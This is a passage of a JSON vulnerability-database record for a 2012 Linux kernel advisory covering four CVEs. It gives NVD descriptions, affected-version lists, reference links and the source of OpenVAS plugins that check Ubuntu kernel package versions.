{"id": "SECURITYVULNS:VULN:12587", "bulletinFamily": "software", "title": "Linux kernel multiple security vulnerabilities", "description": "DoS conditions, information leakage.", "published": "2012-09-18T00:00:00", "modified": "2012-09-18T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12587", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:28560"], "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "type": "securityvulns", "lastseen": "2018-08-31T11:09:48", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "c220e0bbade3bd63f05e63ae8d7e2ef0"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "dcb0e078dc475aefaa97437fef89c1f8"}, {"key": "cvss", "hash": "ed3111898fb94205e2b64cefef5a2081"}, {"key": "description", "hash": "f969ac8bdd368970477089c63e205260"}, {"key": "href", "hash": "8fbcd469a9823743fd01d24277c6bd25"}, {"key": "modified", "hash": "9c970e331ae49b6c67c2066be7bbba5e"}, {"key": "published", "hash": "9c970e331ae49b6c67c2066be7bbba5e"}, {"key": "references", "hash": "8b152730dbeeae072af7bf61049367e0"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "573390067dff741cfd3b211465738356"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "b65a67e8c10b1d44e040ea11a11999074b00223b37dd816f7df75dca235b0749", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-31T11:09:48"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "affectedSoftware": [{"name": "kernel", "operator": "eq", "version": "2.6"}, {"name": "kernel", "operator": "eq", "version": "3.3"}]}

{"cve": [{"lastseen": "2016-09-03T16:41:05", "references": ["https://github.com/torvalds/linux/commit/79549c6dfda0603dba9a70a53467ce62d9335c33", "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=79549c6dfda0603dba9a70a53467ce62d9335c33", "http://www.ubuntu.com/usn/USN-1606-1", "https://bugzilla.redhat.com/show_bug.cgi?id=833428", "http://rhn.redhat.com/errata/RHSA-2012-1064.html", "http://www.ubuntu.com/usn/USN-1567-1", "http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.3.2", "http://www.ubuntu.com/usn/USN-1597-1", "http://www.securityfocus.com/bid/54365", "http://www.securitytracker.com/id?1027236"], "edition": 1, "description": "The copy_creds function in kernel/cred.c in the Linux kernel before 3.3.2 provides an invalid replacement session keyring to a child process, which allows local users to cause a denial of service (panic) via a crafted application that uses the fork system call.", "reporter": "NVD", "published": "2012-08-09T06:29:47", "title": "CVE-2012-2745", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-2745"], "scanner": [], "modified": "2013-04-18T23:22:22", "cpe": ["cpe:/o:linux:linux_kernel:3.3:rc6", "cpe:/o:linux:linux_kernel:3.3:rc7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.3:rc3", "cpe:/o:linux:linux_kernel:3.3:rc2", "cpe:/o:linux:linux_kernel:3.3:rc4", "cpe:/o:linux:linux_kernel:3.3:rc5", "cpe:/o:linux:linux_kernel:3.3:rc1", "cpe:/o:linux:linux_kernel:3.3.1"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2745", "id": "CVE-2012-2745", "cvss": {"score": 4.7, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T16:50:03", "references": ["https://github.com/torvalds/linux/commit/06b6a1cf6e776426766298d055bb3991957d90a7", "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=06b6a1cf6e776426766298d055bb3991957d90a7", "https://www.suse.com/support/update/announcement/2012/suse-su-20121679-1.html", "http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.0.44", "http://www.ubuntu.com/usn/USN-1580-1", "https://bugzilla.redhat.com/show_bug.cgi?id=820039", "http://www.ubuntu.com/usn/USN-1579-1", "http://www.ubuntu.com/usn/USN-1575-1", "http://www.ubuntu.com/usn/USN-1578-1", "http://rhn.redhat.com/errata/RHSA-2012-1323.html", "http://www.ubuntu.com/usn/USN-1567-1", "http://www.ubuntu.com/usn/USN-1568-1", "http://www.ubuntu.com/usn/USN-1572-1", "http://www.openwall.com/lists/oss-security/2012/07/26/5", "http://www.ubuntu.com/usn/USN-1577-1"], "edition": 1, "description": "The rds_recvmsg function in net/rds/recv.c in the Linux kernel before 3.0.44 does not initialize a certain structure member, which allows local users to obtain potentially sensitive information from kernel stack memory via a (1) recvfrom or (2) recvmsg system call on an RDS socket.", "reporter": "NVD", "published": "2012-10-03T07:02:56", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "title": "CVE-2012-3430", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-3430"], "scanner": [], "modified": "2013-04-18T23:23:26", "cpe": ["cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3430", "id": "CVE-2012-3430", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-03T16:51:18", "references": ["https://github.com/torvalds/linux/commit/9ab4233dd08036fe34a89c7dc6f47a8bf2eb29eb", "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=9ab4233dd08036fe34a89c7dc6f47a8bf2eb29eb", "http://www.openwall.com/lists/oss-security/2012/08/20/13", "http://ubuntu.com/usn/usn-1529-1", "http://www.securityfocus.com/bid/55151", "http://www.ubuntu.com/usn/USN-1567-1", "http://www.ubuntu.com/usn/USN-1572-1", "https://bugzilla.redhat.com/show_bug.cgi?id=849734", "http://www.ubuntu.com/usn/USN-1577-1", "http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.4.5"], "edition": 1, "description": "Multiple race conditions in the madvise_remove function in mm/madvise.c in the Linux kernel before 3.4.5 allow local users to cause a denial of service (use-after-free and system crash) via vectors involving a (1) munmap or (2) close system call.", "reporter": "NVD", "published": "2012-10-03T23:28:35", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "cve", "title": "CVE-2012-3511", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-3511"], "scanner": [], "modified": "2013-10-23T23:40:07", "cpe": ["cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.2:rc5", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.2:rc4", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.3:rc6", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.3:rc7", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.2:rc2", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.3:rc3", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.3:rc2", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.0:rc1", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.1:rc4", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2:rc6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.2:rc7", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.3:rc4", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.0:rc7", "cpe:/o:linux:linux_kernel:3.2:rc3", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.0:rc4", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.0:rc2", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.1:rc1", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.3:rc5", "cpe:/o:linux:linux_kernel:3.1:rc2", "cpe:/o:linux:linux_kernel:3.3:rc1", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.0:rc6", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.0:rc3", "cpe:/o:linux:linux_kernel:3.0:rc5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.1:rc3"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3511", "id": "CVE-2012-3511", "cvss": {"score": 6.2, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T16:49:48", "references": ["http://rhn.redhat.com/errata/RHSA-2012-1324.html", "http://rhn.redhat.com/errata/RHSA-2012-1430.html", "https://www.suse.com/support/update/announcement/2012/suse-su-20121679-1.html", "http://www.ubuntu.com/usn/USN-1580-1", "http://rhn.redhat.com/errata/RHSA-2012-1401.html", "http://lists.opensuse.org/opensuse-security-announce/2012-10/msg00005.html", "http://www.ubuntu.com/usn/USN-1579-1", "http://rhn.redhat.com/errata/RHSA-2012-1375.html", "http://www.openwall.com/lists/oss-security/2012/08/03/4", "http://www.ubuntu.com/usn/USN-1575-1", "http://rhn.redhat.com/errata/RHSA-2012-1347.html", "http://www.ubuntu.com/usn/USN-1578-1", "http://rhn.redhat.com/errata/RHSA-2012-1323.html", "http://www.ubuntu.com/usn/USN-1567-1", "http://www.ubuntu.com/usn/USN-1568-1", "http://www.ubuntu.com/usn/USN-1572-1", "https://bugzilla.redhat.com/show_bug.cgi?id=844714", "https://github.com/torvalds/linux/commit/68cb695ccecf949d48949e72f8ce591fdaaa325c", "http://www.ubuntu.com/usn/USN-1577-1", "http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.2.30"], "edition": 1, "description": "The sfc (aka Solarflare Solarstorm) driver in the Linux kernel before 3.2.30 allows remote attackers to cause a denial of service (DMA descriptor consumption and network-controller outage) via crafted TCP packets that trigger a small MSS value.", "reporter": "NVD", "published": "2012-10-03T07:02:56", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "CVE-2012-3412", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-3412"], "scanner": [], "modified": "2013-08-17T02:46:41", "cpe": ["cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.2.10"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3412", "id": "CVE-2012-3412", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-12-04T11:19:54", "references": ["http://www.ubuntu.com/usn/usn-1567-1/", "1567-1"], "pluginID": "841147", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1567-1", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Ubuntu Update for linux USN-1567-1", "type": "openvas", "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841147", "id": "OPENVAS:841147", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1567_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux USN-1567-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n \n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1567-1\";\ntag_affected = \"linux on Ubuntu 11.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1567-1/\");\n script_id(841147);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-17 16:55:00 +0530 (Mon, 17 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1567-1\");\n script_name(\"Ubuntu Update for linux USN-1567-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-omap\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc64-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-versatile\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:35", "references": ["1574-1", "http://www.ubuntu.com/usn/usn-1574-1/"], "pluginID": "1361412562310841150", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1574-1", "edition": 5, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "title": "Ubuntu Update for linux-lts-backport-natty USN-1574-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2018-08-17T00:00:00", "id": "OPENVAS:1361412562310841150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841150", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1574_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux-lts-backport-natty USN-1574-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1574-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841150\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:18 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1574-1\");\n script_name(\"Ubuntu Update for linux-lts-backport-natty USN-1574-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1574-1\");\n script_tag(name:\"affected\", value:\"linux-lts-backport-natty on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:36", "references": ["1574-1", "http://www.ubuntu.com/usn/usn-1574-1/"], "pluginID": "841150", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1574-1", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-09-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Ubuntu Update for linux-lts-backport-natty USN-1574-1", "type": "openvas", "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3511", "CVE-2012-2745", "CVE-2012-3412", "CVE-2012-3430"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841150", "id": "OPENVAS:841150", "sourceData": 